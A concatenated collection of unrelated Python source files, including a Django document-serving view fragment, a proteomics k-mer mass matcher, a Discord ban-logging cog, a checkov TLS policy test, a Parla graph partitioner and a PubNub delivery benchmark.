context['sectionopts'] = context['section']._meta return render(request, template, context) if node.node_type == 'documents': if node.content_type == 'document': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.content_type == 'boardpolicy': return HttpResponse(status=200) if node.content_type == 'policy': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.content_type == 'administrativeprocedure': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.content_type == 'supportingdocument': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.content_type == 'boardmeetingagenda': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.content_type == 'boardmeetingminutes': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.content_type == 'boardmeetingaudio': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_audiofile_node', queryset=( AudioFile .objects .filter(deleted=0) .filter(published=1) .only( 'title', 'file_file', 'related_node', ) ) ) ) ) item = item.first() template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.content_type == 'boardmeetingvideo': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_videofile_node', queryset=( VideoFile .objects .filter(deleted=0) .filter(published=1) .only( 'title', 'file_file', 'related_node', ) ) ) ) ) item = item.first() template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.content_type == 'boardmeetingexhibit': return HttpResponse(status=200) if node.content_type == 'boardmeetingagendaitem': return HttpResponse(status=200) if node.node_type == 'files': item = ( Model .objects .get(pk=node.pk) ) response = HttpResponse() response['Content-Type'] = '' response['X-Accel-Redirect'] = item.file_file.url response['Content-Disposition'] = 'filename={0}'.format( item.file_name() ) return response if node.node_type == 'images': item = ( Model .objects .get(pk=node.pk) ) response = HttpResponse() response['Content-Type'] = '' response['X-Accel-Redirect'] = item.image_file.url response['Content-Disposition'] = 'filename={0}'.format( item.file_name() ) return response if node.node_type == 'directoryentries': if node.content_type == 'schoolfaculty': template = set_template(request, node) context = {} context['page'] = ( Model .objects .filter(deleted=0) .filter(published=1) .filter(pk=node.pk) ) context['page'] = prefetch_disclosuredocuments_detail(context['page']) context['page'] = prefetch_classwebsite_detail(context['page']) context = add_additional_context(request, context, node) context['page'] = context['page'].first() context['pageopts'] = context['page']._meta context['section'] = context['page'].get_ancestors(ascending=True).filter( deleted=0, published=1, pagelayout__namespace='site-section.html' ).first() if context['section']: context['section'] = commonfunctions.nodefindobject(context['section']) context['sectionopts'] = context['section']._meta return render(request, template, context) return HttpResponse(status=404)
nilq/baby-python
python
""" After implementation of DIP (Dependency Inversion Principle). The dependency (Database or CSV) is now injected in the Products class via a repository of type Database or CSV. A factory is used to create a Database or CSV repository. """ class ProductRepository: @staticmethod def select_products(): raise NotImplementedError class DatabaseProductRepository(ProductRepository): @staticmethod def select_products(): """Mock data retrieval from a database.""" return ['Laptop', 'Car'] class CSVProductRepository(ProductRepository): @staticmethod def select_products(): """Mock data retrieval from a CSV file.""" return ['TV', 'Radio'] class ProductFactory: @staticmethod def create(repo_type): if repo_type == 'DB': return DatabaseProductRepository() else: return CSVProductRepository() class Products: def __init__(self, repo: ProductRepository): self._products = [] self.repo = repo def get_products(self): self._products = self.repo.select_products() @property def products(self): return self._products if __name__ == '__main__': product_repo = ProductFactory.create('DB') products = Products(product_repo) products.get_products() print(products.products) product_repo = ProductFactory.create('CSV') products = Products(product_repo) products.get_products() print(products.products)
nilq/baby-python
python
## import os from setuptools import setup, find_namespace_packages from pkg_resources import get_distribution, DistributionNotFound def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() setup ( name = "namespace.HeardBox", use_scm_version = True, setup_requires=['setuptools_scm'], version = "0.0.1", author = "Conor Edwards", author_email = "conorlo@hotmail.co.uk", description = ("Interface the Heard Proteomic Database with Python"), url = "http://wwww.github.com/ConorEd/HeardBox", # packages['HeardBox', 'tests'], #license = "BSD", keywords = "Uniprot Excel Interface, Bioinformatics, Quality of life improvement, BLAST, ALIGN, GO, Excel", long_description=read("README.txt"), classifiers=[ "Development Sttus :: 2 - Pre-Alpha", "Topic :: Science", "License :: OSI Approved :: BSD License", ], package_dir={'': 'src'}, packages=find_namespace_packages(where='src'), install_requires=['xlwings', 'biopython', 'uniprot_tools'], entry_points={ 'console_scripts': [ 'main = HeardBox.main:main_func', #'ext_mod = HeardBox._mod:some_func', ] } ) #├── setup.py #├── src #│ └── namespace #│ └── mypackage #│ ├── __init__.py #│ └── mod1.py #└── tests # └── test_mod1.py
nilq/baby-python
python
"""Regression.""" from ._linear_regression import LinearRegression from ._neighbors_regression import ( KNeighborsRegressor, RadiusNeighborsRegressor, )
nilq/baby-python
python
#!/usr/bin/python #-*- coding: utf-8 -*- # >.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>. # Licensed under the Apache License, Version 2.0 (the "License") # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # --- File Name: parser.py # --- Creation Date: 24-02-2020 # --- Last Modified: Tue 25 Feb 2020 16:26:55 AEDT # --- Author: Xinqi Zhu # .<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.< """ Parser for VP metrics """ import argparse def init_parser(): parser = argparse.ArgumentParser(description='VP metrics.') parser.add_argument('--result_dir', help='Results directory.', type=str, default='/mnt/hdd/repo_results/VP-metrics-pytorch') parser.add_argument('--data_dir', help='Dataset directory.', type=str, default='/mnt/hdd/Datasets/test_data') parser.add_argument('--no_gpu', help='Do not use GPUs.', action='store_true') parser.add_argument('--in_channels', help='Num channels for model input.', type=int, default=6) parser.add_argument('--out_dim', help='Num output dimension.', type=int, default=7) parser.add_argument('--lr', help='Learning rate.', type=float, default=0.01) parser.add_argument('--batch_size', help='Batch size.', type=int, default=32) parser.add_argument('--epochs', help='Num epochs to train.', type=int, default=60) parser.add_argument('--input_mode', help='Input mode for model.', type=str, default='concat', choices=['concat', 'diff']) parser.add_argument('--test_ratio', help='Test set ratio.', type=float, default=0.5) parser.add_argument('--workers', help='Num workers.', type=int, default=4) return parser
nilq/baby-python
python
# Generated by Django 3.2.6 on 2021-08-27 19:20 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('university', '0006_representative'), ] operations = [ migrations.AddField( model_name='course', name='slug_unimi', field=models.CharField(max_length=200, null=True, unique=True), ), migrations.AlterField( model_name='department', name='name', field=models.CharField(max_length=128, unique=True, verbose_name='name'), ), migrations.AlterUniqueTogether( name='degree', unique_together={('name', 'type')}, ), ]
nilq/baby-python
python
from utils import hashable_boundaries, predicted_len from objects import Database from collections import defaultdict from math import ceil import gen_spectra def modified_sort_masses_in_sorted_keys_b(db_dict_b,mz,kmer_list_b): kmers = db_dict_b[mz] kmer_list_b += kmers def modified_sort_masses_in_sorted_keys_y(db_dict_y,mz,kmer_list_y): kmers = db_dict_y[mz] kmer_list_y += kmers def handle_sorting_keys(db_dict_b, db_dict_y, kmer_list): sorted_b_keys = sorted(db_dict_b.keys()) sorted_y_keys = sorted(db_dict_y.keys()) for mz in sorted_b_keys: modified_sort_masses_in_sorted_keys_b(db_dict_b,mz,kmer_list) for mz in sorted_y_keys: modified_sort_masses_in_sorted_keys_y(db_dict_y,mz,kmer_list) def modified_add_all(kmer, prot_name,db_dict_b,db_dict_y,kmer_set,start_location,end_location,protein_number): for ion in 'by': for charge in [1, 2]: pre_spec = gen_spectra.gen_spectrum(kmer, ion=ion, charge=charge) spec = pre_spec if isinstance(pre_spec,dict): spec = pre_spec.get('spectrum') for i, mz in enumerate(spec): start_position = start_location if ion == 'b' else end_location end_position = start_position + i if ion == 'b' else end_location - i kmer_to_add = kmer[:i+1] if ion == 'b' else kmer[-i-1:] r_d = db_dict_b if ion == 'b' else db_dict_y # r_d[mz].add(kmer_to_add) if ion == 'b': r_d[mz].add((mz, protein_number, kmer_to_add, str(start_position) + '-' + str(end_position), ion, charge)) else: r_d[mz].add((mz, protein_number, kmer_to_add, str(end_position) + '-' + str(start_position), ion, charge)) kmer_set[kmer_to_add].append(prot_name) def make_database_set_for_protein(i,plen,max_len,prot_entry,prot_name,db_dict_b,db_dict_y,kmer_set): print(f'\rOn protein {i+1}/{plen} [{int((i+1) * 100 / plen)}%]', end='') start = 1 stop = max_len for j in range(start, stop): kmer = prot_entry.sequence[:j] start_position = 1 end_position = j modified_add_all(kmer, prot_name, db_dict_b,db_dict_y,kmer_set, start_position, end_position, i) start = 0 stop = len(prot_entry.sequence) - max_len for j in range(start, stop): kmer = prot_entry.sequence[j:j+max_len] start_position = j + 1 end_position = j + max_len modified_add_all(kmer, prot_name, db_dict_b,db_dict_y,kmer_set,start_position, end_position, i) start = len(prot_entry.sequence) - max_len stop = len(prot_entry.sequence) for j in range(start, stop): kmer = prot_entry.sequence[j:] start_position = j+1 end_position = len(prot_entry.sequence) modified_add_all(kmer, prot_name,db_dict_b,db_dict_y,kmer_set,start_position, end_position, i) def make_database_set_for_proteins(proteins,max_len,db_dict_b,db_dict_y,kmer_set): plen = len(proteins) for i, (prot_name, prot_entry) in enumerate(proteins): make_database_set_for_protein(i,plen,max_len,prot_entry,prot_name,db_dict_b,db_dict_y,kmer_set) def modified_make_database_set(proteins: list, max_len: int): db_dict_b = defaultdict(set) db_dict_y = defaultdict(set) kmer_set = defaultdict(list) make_database_set_for_proteins(proteins,max_len,db_dict_b,db_dict_y,kmer_set) print('\nSorting the set of protein masses...') kmer_list = [] handle_sorting_keys(db_dict_b, db_dict_y, kmer_list) kmer_list = sorted(kmer_list, key=lambda x: x[0]) print('Sorting the set of protein masses done') return kmer_list, kmer_set def in_bounds(int1, interval): if int1 >= interval[0] and int1 <= interval[1]: return True else: return False def modified_merge(kmers, boundaries: dict): matched_masses_b, matched_masses_y = defaultdict(list), defaultdict(list) #Goal: b and y dictionaries mapping mz values to lists of kmers that have a mass within the tolerance # kmers = make_database_set(db.proteins, max_len) mz_mapping = dict() for i,mz in enumerate(boundaries): mz_mapping[i] = boundaries[mz] boundary_index, kmer_index, starting_point = 0,0,0 while (boundary_index < len(boundaries)) and (kmer_index < len(kmers)): #idea is to increment kmer index when mass is too small for boundaries[0] and then stop when mass is too big for boundaries[1] target_kmer = kmers[kmer_index] target_boundary = mz_mapping[boundary_index] if in_bounds(target_kmer[0], target_boundary): if target_kmer[4] == 'b': hashable_boundary = hashable_boundaries(target_boundary) matched_masses_b[hashable_boundary].append(target_kmer) kmer_index = kmer_index + 1 if target_kmer[4] == 'y': hashable_boundary = hashable_boundaries(target_boundary) matched_masses_y[hashable_boundary].append(target_kmer) kmer_index = kmer_index + 1 elif target_kmer[0] < target_boundary[0]: kmer_index = kmer_index + 1 starting_point = starting_point + 1 else: #target_kmer > target_boundary[1] boundary_index = boundary_index + 1 kmer_index = starting_point return matched_masses_b, matched_masses_y # def modified_add_matched_to_matched_set(matched_masses_b_batch,matched_masses_b,kmer_set,batch_kmer_set,matched_masses_y_batch,matched_masses_y): # for k, v in matched_masses_b_batch.items(): # matched_masses_b[k] += v # for kmer in v: # kmer_set[kmer] += batch_kmer_set[kmer] # for k, v in matched_masses_y_batch.items(): # matched_masses_y[k] += v # for kmer in v: # kmer_set[kmer] += batch_kmer_set[kmer] def modified_match_masses_per_protein(kv_prots,max_len,boundaries,kmer_set): extended_kv_prots = [(k, entry) for (k, v) in kv_prots for entry in v] kmers, kmer_set = modified_make_database_set(extended_kv_prots, max_len) # check_for_y_kmers(kmers) matched_masses_b, matched_masses_y = modified_merge(kmers, boundaries) # modified_add_matched_to_matched_set(matched_masses_b,kmer_set,kmers,matched_masses_y) return matched_masses_b, matched_masses_y, kmer_set def modified_match_masses(boundaries: dict, db: Database, max_pep_len: int): # matched_masses_b, matched_masses_y, kmer_set = defaultdict(list), defaultdict(list), defaultdict(list) #Not sure this is needed max_boundary = max(boundaries.keys()) estimated_max_len = ceil(boundaries[max_boundary][1] / 57.021464) max_len = min(estimated_max_len, max_pep_len) kv_prots = [(k, v) for k, v in db.proteins.items()] matched_masses_b, matched_masses_y, kmer_set = modified_match_masses_per_protein(kv_prots,max_len,boundaries,db) return (matched_masses_b, matched_masses_y, kmer_set) def check_for_y_kmers(kmers): for i, kmer in enumerate(kmers): if kmer[4] == 'y': print("FOUND at:", i, kmer)
nilq/baby-python
python
"""This module contains the support resources for the two_party_negotiation protocol."""
nilq/baby-python
python
""" Manages updateing info-channels (Currently only `log` channel) """ from typing import Union import discord from discord.ext import commands class InfoChannels(commands.Cog): def __init__(self, bot: commands.Bot): print('Loading InfoChannels module...', end='') self.bot = bot self.guild_config_cog = bot.get_cog('GuildConfigCog') self.allowed_mentions = discord.AllowedMentions(everyone=False, users=False, roles=False) print(' Done') @commands.Cog.listener() async def on_member_ban(self, guild: discord.Guild, user: Union[discord.User, discord.Member]): guild_config = await self.guild_config_cog.get_guild(guild) log_channel = await guild_config.get_log_channel() if log_channel: await log_channel.send('{} was banned'.format(str(user))) @commands.Cog.listener() async def on_member_unban(self, guild: discord.Guild, user: discord.User): guild_config = await self.guild_config_cog.get_guild(guild) log_channel = await guild_config.get_log_channel() if log_channel: await log_channel.send('{} was unbanned'.format(str(user))) def setup(bot: commands.Bot): bot.add_cog(InfoChannels(bot))
nilq/baby-python
python
print(""" 042) Refaça o DESAFIO 035 dois triângulos, acrescentando o recurso de mostrar que tipo de triângulo será formado: - Equilátero: todos os lados iguais - Isósceles: dois lados iguais - Escaleno: todos os lados diferentes """) print(""" Este programa recebe o valor de três retas e verifica se, com elas, é possível formar um triângulo. Para isso é importante saber que a a soma de quaisquer dois lados de um triângulo deve, SEMPRE, ser maior que o terceiro lado restante. """) L1 = float(input('Digite o comprimento da primeira reta: ')) L2 = float(input('Digite o comprimento da segunda reta: ')) L3 = float(input('Digite o comprimento da terceira reta: ')) if L1 < L2 + L3 and L2 < L1 + L3 and L3 < L1 + L2: print('Os segmentos formam um triângulo: ') if L1 == L2 == L3: print('O triângulo possui os três lados iguais, portanto ele é EQUILÁTERO') elif L1 == L2 or L1 == L3 or L2 == L3: print('O triângulo possui dois lados iguais, portanto ele é ISÓSCELES') else: print('O triângulo possui dos três lados diferentes, porém ele é ESCALENO') else: print('Os segmentos não formam um triângulo')
nilq/baby-python
python
import unittest import hcl2 from checkov.common.models.enums import CheckResult from checkov.terraform.checks.resource.aws.AppLoadBalancerTLS12 import check class TestAppLoadBalancerTLS12(unittest.TestCase): def test_failure(self): resource_conf = {'load_balancer_arn': ['${aws_lb.examplea.arn}'], 'port': ['443'], 'protocol': ['HTTPS'], 'ssl_policy': ["ELBSecurityPolicy-2016-08"], 'default_action': [{'type': ['forward'], 'target_group_arn': ['${aws_lb_target_group.examplea.arn}'] }]} scan_result = check.scan_resource_conf(conf=resource_conf) self.assertEqual(CheckResult.FAILED, scan_result) def test_success(self): resource_conf = { 'load_balancer_arn': [ '${aws_lb.examplea.arn}' ], 'port': ['443'], 'protocol': ['HTTPS'], 'ssl_policy': ["ELBSecurityPolicy-TLS-1-2-2017-01"], 'default_action': [ { 'type': ['forward'], 'target_group_arn': [ '${aws_lb_target_group.examplea.arn}' ] } ] } scan_result = check.scan_resource_conf(conf=resource_conf) self.assertEqual(CheckResult.PASSED, scan_result) def test_nlb_tls_success(self): resource_conf = { 'load_balancer_arn': [ '${aws_lb.example.arn}' ], 'port': ['443'], 'protocol': ['TLS'], 'ssl_policy': ["ELBSecurityPolicy-FS-1-2-Res-2019-08"], 'default_action': [ { 'type': ['forward'], 'target_group_arn': [ '${aws_lb_target_group.example.arn}' ] } ] } scan_result = check.scan_resource_conf(conf=resource_conf) self.assertEqual(CheckResult.PASSED, scan_result) def test_redirect(self): hcl_res = hcl2.loads(""" resource "aws_lb_listener" "http" { load_balancer_arn = aws_lb.public.arn port = "80" protocol = "HTTP" default_action { redirect { port = "443" protocol = "HTTPS" status_code = "HTTP_301" } type = "redirect" } } """) resource_conf = hcl_res['resource'][0]['aws_lb_listener']['http'] scan_result = check.scan_resource_conf(conf=resource_conf) self.assertEqual(CheckResult.PASSED, scan_result) if __name__ == '__main__': unittest.main()
nilq/baby-python
python
class Solution: def longestValidParenthesesSlow(self, s: str) -> int: stack, ans = [-1], 0 for i in range(len(s)): if s[i] == ")" and len(stack) > 1 and s[stack[-1]] == "(": stack.pop() ans = max(ans, i - stack[-1]) else: stack.append(i) return ans def longestValidParenthesesFast(self, s: str) -> int: left, right, ans = 0, 0, 0 for c in s: if c == "(": left += 1 else: right += 1 if left == right: ans = max(ans, right * 2) elif left < right: left, right = 0, 0 left, right = 0, 0 for c in s[::-1]: if c == "(": left += 1 else: right += 1 if left == right: ans = max(ans, left * 2) elif left > right: left, right = 0, 0 return ans # TESTS for s, expected in [ ("(()", 2), (")()())", 4), ("", 0), ("()(()", 2), ("()(())", 6), ("((()()", 4), ("((())", 4), ("))(())", 4), ("()(()()", 4), ]: sol = Solution() actual1 = sol.longestValidParenthesesSlow(s) actual2 = sol.longestValidParenthesesFast(s) print("Longest valid parentheses in", s, "->", actual1) assert actual1 == expected and actual2 == expected
nilq/baby-python
python
from flask import Flask, redirect from flask_fileupload import FlaskFileUpload from flask_login import LoginManager, UserMixin, login_user, logout_user app = Flask(__name__) app.config.from_object("config") lm = LoginManager(app) fue = FlaskFileUpload(app) class User(UserMixin): def __init__(self, user_id): self.id = user_id @lm.user_loader def load_user(user_id): return User(user_id) @app.route("/login/") def login(): user = User("testuser") login_user(user) return redirect("/upload") @app.route("/logout/") def logout(): logout_user() return redirect("/")
nilq/baby-python
python
""" This module implements graph/sparse matrix partitioning inspired by Gluon. The goal of this module is to allow simple algorithms to be written against the current sequential implementation, and eventually scale (without changes) to parallel or even distributed partitioning. As such, many functions guarantee much less than they currently provide (e.g., `~PartitioningAlgorithm.get_edge_master` is only guaranteed to see it's source and destination in `~PartitioningAlgorithm.vertex_masters` even though the initial sequential implementation will actually provide all masters.) The partitioner uses two functions getVertexMaster and getEdgeMaster similar to those used by Gluon, but also provides access to vertex attributes like position. The `~PartitioningAlgorithm.get_vertex_master` function selects the master based on vertex attributes or more typical graph properties. The `~PartitioningAlgorithm.get_edge_master` function selects the master based on edge properties and the masters selected for the endpoints. The partitioner also takes a `~PartitioningAlgorithm.neighborhood_size` parameter which specifies how far away from each vertex proxies are needed. Edge proxies are included for all edges between vertices present on each node (either as master or as a proxy). This module will work just like normal Gluon if neighborhood size is 1. For vertex position based partitioning, we can just assign the node masters based on position and set an appropriate neighborhood. For your sweeps algorithm, set neighborhood size to 2 and assign masters as needed. """ from abc import abstractmethod, ABCMeta, abstractproperty from collections import namedtuple from typing import Sequence, Set # FIXME: This load of numpy will cause problems if it needs to be multiloaded # from parla import multiload # with multiload(): import numpy as np import scipy.sparse __all__ = [ "VertexID", "PartitionID", "GraphProperties", "PartitioningAlgorithm" ] VertexID = int PartitionID = int class GraphProperties: def __init__(self, A: scipy.sparse.spmatrix): """ Compute the graph properties of `A`. This is called by the `PartitioningAlgorithm` framework. """ assert A.shape[0] == A.shape[1], "Parla only support partitioning homogeneous graphs with square edge matrices." self.A = A """ The edge matrix of the graph. """ self.n_vertices = A.shape[0] """ The number of vertices. """ self.n_edges = A.count_nonzero() """ The number of edges. """ nonzeros = (A != 0) # TODO: There MUST be a better way to do this. self.in_degree = nonzeros.sum(0).A.flatten() """ A dense array containing the in degree of each vertex. """ self.out_degree = nonzeros.sum(1).A.flatten() """ A dense array containing the out degree of each vertex. """ class Partition(namedtuple("Partition", ("edges", "vertex_global_ids", "vertex_masters", "edge_masters"))): """ An instance of `Partition` contains all of the data available to a specific partition. """ edges: scipy.sparse.spmatrix """ A sparse matrix containing all edges in this partition (both master copies and proxies). """ vertex_global_ids: np.ndarray """ A dense array of the global IDs of each vertex which is available locally (as a master copy or a proxy). In other words, this array is a mapping from local ID to global ID for all vertices what exist locally. The global IDs are always in ascending order. """ vertex_masters: np.ndarray """ An array of the master partitions for every vertex. """ edge_masters: scipy.sparse.spmatrix """ A sparse matrix of the master partitions for all locally available edges. The structure of this sparse matrix is identical to `edges`. """ class PartitioningAlgorithm(metaclass=ABCMeta): graph_properties: GraphProperties """ The `GraphProperties` of the graph bring partitioned. What data is available in it depends on the context in which it is accessed. """ vertex_masters: np.ndarray """ The vertex masters that have already been assigned. This data structure is not sequential consistent. See `get_vertex_master` and `get_edge_master` for information about what elements are guaranteed to be up to date during those calls. """ # ... user-defined state ... @abstractproperty def n_partitions(self) -> int: """ :return: The number of partitions this partitioner will create. (All partition IDs must be 0 < id < `n_partitions`) """ pass @abstractproperty def neighborhood_size(self) -> int: """ :return: The number of neighboring proxy vertices to include in each partition. Must be >= 0. A value of 0 will result in no proxies at all. """ pass @abstractmethod def get_vertex_master(self, vertex_id: VertexID) -> PartitionID: """ Compute the master partition ID for a vertex. This function may use `graph_properties` and the metadata of the specific vertex. :param vertex_id: The global ID of the vertex. :return: The master partition ID for the vertex. """ pass @abstractmethod def get_edge_master(self, src_id: VertexID, dst_id: VertexID) -> PartitionID: """ Compute the master partition ID for the specified edge. This function may use `vertex_masters`, but the only elements guaranteed to be present are `src_id` and `dst_id`. This function may use `graph_properties` freely. :param src_id: The global ID of the source vertex :param dst_id: The global ID of the target vertex :return: The master partition ID for the edge. """ pass def partition(self, A: scipy.sparse.spmatrix, edge_matrix_type=scipy.sparse.csr_matrix) -> Sequence[Partition]: """ Partition `A`. This operation mutates `self` and hence is not thread-safe. Some implementation of this may be internally parallel. :param A: The complete sparse edge matrix. :param edge_matrix_type: The type of edge matrix to build for each partition. This is used for both `Partition.edges` and `Partition.edge_masters`. :return: A sequence of `Partition` objects in ID order. """ n_parts = self.n_partitions neighborhood_size = self.neighborhood_size self.graph_properties = GraphProperties(A) self.vertex_masters = np.empty(shape=(self.graph_properties.n_vertices,), dtype=int) self.vertex_masters[:] = -1 edge_masters = scipy.sparse.csr_matrix(A.shape, dtype=int) partition_vertices: Sequence[Set[int]] = [set() for _ in range(n_parts)] # partition_n_edges = np.zeros(shape=(n_parts,), dtype=int) n, m = A.shape assert n == m, "Parla only support partitioning homogeneous graphs with square edge matrices." # Assign vertex masters for i in range(n): master = self.get_vertex_master(i) assert master >= 0 and master < n_parts, f"partition {master} is invalid ({n_parts} partitions)" self.vertex_masters[i] = master # TODO: This does not yet implement neighborhood > 1 # Assign edge owners # TODO:PERFORMANCE: Iterate values without building index lists? for (i, j) in zip(*A.nonzero()): owner = self.get_edge_master(i, j) assert owner >= 0 and owner < n_parts, f"partition {owner} is invalid ({n_parts} partitions)" # partition_n_edges[owner] += 1 partition_vertices[owner].add(i) partition_vertices[owner].add(j) # Build id maps partition_global_ids = [np.array(sorted(vs)) for vs in partition_vertices] # Construct in a efficiently updatable form (LiL) # TODO:PERFORMANCE: It would be more efficient to build directly in CSR or the appropriate output format. partition_edges = [scipy.sparse.lil_matrix((m.shape[0], m.shape[0])) for m in partition_global_ids] for (i, j) in zip(*A.nonzero()): owner = self.get_edge_master(i, j) assert owner >= 0 and owner < n_parts, f"partition {owner} is invalid ({n_parts} partitions)" global_ids = partition_global_ids[owner] # TODO:PERFORANCE: Use a reverse index? partition_edges[owner][global_ids.searchsorted(i), global_ids.searchsorted(j)] = A[i, j] # Convert to compressed form return [Partition(edge_matrix_type(edges), global_ids, self.vertex_masters, edge_masters) for edges, global_ids in zip(partition_edges, partition_global_ids)]
nilq/baby-python
python
## www.pubnub.com - PubNub Real-time push service in the cloud. # coding=utf8 ## PubNub Real-time Push APIs and Notifications Framework ## Copyright (c) 2010 Stephen Blum ## http://www.pubnub.com/ ## ----------------------------------- ## PubNub 3.1 Real-time Push Cloud API ## ----------------------------------- import sys import datetime import time import math from pubnub import PubnubTwisted as Pubnub ## ----------------------------------------------------------------------- ## Configuration ## ----------------------------------------------------------------------- publish_key = len(sys.argv) > 1 and sys.argv[1] or 'demo' subscribe_key = len(sys.argv) > 2 and sys.argv[2] or 'demo' secret_key = len(sys.argv) > 3 and sys.argv[3] or 'demo' cipher_key = len(sys.argv) > 4 and sys.argv[4] or 'demo' ssl_on = len(sys.argv) > 5 and bool(sys.argv[5]) or False origin = len(sys.argv) > 6 and sys.argv[6] or 'pubsub.pubnub.com' origin = '184.72.9.220' ## ----------------------------------------------------------------------- ## Analytics ## ----------------------------------------------------------------------- analytics = { 'publishes': 0, # Total Send Requests 'received': 0, # Total Received Messages (Deliveries) 'queued': 0, # Total Unreceived Queue (UnDeliveries) 'successful_publishes': 0, # Confirmed Successful Publish Request 'failed_publishes': 0, # Confirmed UNSuccessful Publish Request 'failed_deliveries': 0, # (successful_publishes - received) 'deliverability': 0 # Percentage Delivery } trips = { 'last': None, 'current': None, 'max': 0, 'avg': 0 } ## ----------------------------------------------------------------------- ## Initiat Class ## ----------------------------------------------------------------------- channel = 'deliverability-' + str(time.time()) pubnub = Pubnub( publish_key, subscribe_key, secret_key=secret_key, cipher_key=cipher_key, ssl_on=ssl_on, origin=origin ) ## ----------------------------------------------------------------------- ## BENCHMARK ## ----------------------------------------------------------------------- def publish_sent(info=None): if info and info[0]: analytics['successful_publishes'] += 1 else: analytics['failed_publishes'] += 1 analytics['publishes'] += 1 analytics['queued'] += 1 pubnub.timeout(send, 0.1) def send(): if analytics['queued'] > 100: analytics['queued'] -= 10 return pubnub.timeout(send, 10) pubnub.publish({ 'channel': channel, 'callback': publish_sent, 'message': "1234567890" }) def received(message): analytics['queued'] -= 1 analytics['received'] += 1 current_trip = trips['current'] = str(datetime.datetime.now())[0:19] last_trip = trips['last'] = str( datetime.datetime.now() - datetime.timedelta(seconds=1) )[0:19] ## New Trip Span (1 Second) if current_trip not in trips: trips[current_trip] = 0 ## Average if last_trip in trips: trips['avg'] = (trips['avg'] + trips[last_trip]) / 2 ## Increment Trip Counter trips[current_trip] = trips[current_trip] + 1 ## Update Max if trips[current_trip] > trips['max']: trips['max'] = trips[current_trip] def show_status(): ## Update Failed Deliveries analytics['failed_deliveries'] = \ analytics['successful_publishes'] \ - analytics['received'] ## Update Deliverability analytics['deliverability'] = ( float(analytics['received']) / float(analytics['successful_publishes'] or 1.0) ) * 100.0 ## Print Display print(( "max:%(max)03d/sec " + "avg:%(avg)03d/sec " + "pubs:%(publishes)05d " + "received:%(received)05d " + "spub:%(successful_publishes)05d " + "fpub:%(failed_publishes)05d " + "failed:%(failed_deliveries)05d " + "queued:%(queued)03d " + "delivery:%(deliverability)03f%% " + "" ) % { 'max': trips['max'], 'avg': trips['avg'], 'publishes': analytics['publishes'], 'received': analytics['received'], 'successful_publishes': analytics['successful_publishes'], 'failed_publishes': analytics['failed_publishes'], 'failed_deliveries': analytics['failed_deliveries'], 'publishes': analytics['publishes'], 'deliverability': analytics['deliverability'], 'queued': analytics['queued'] }) pubnub.timeout(show_status, 1) def connected(): show_status() pubnub.timeout(send, 1) print("Connected: %s\n" % origin) pubnub.subscribe({ 'channel': channel, 'connect': connected, 'callback': received }) ## ----------------------------------------------------------------------- ## 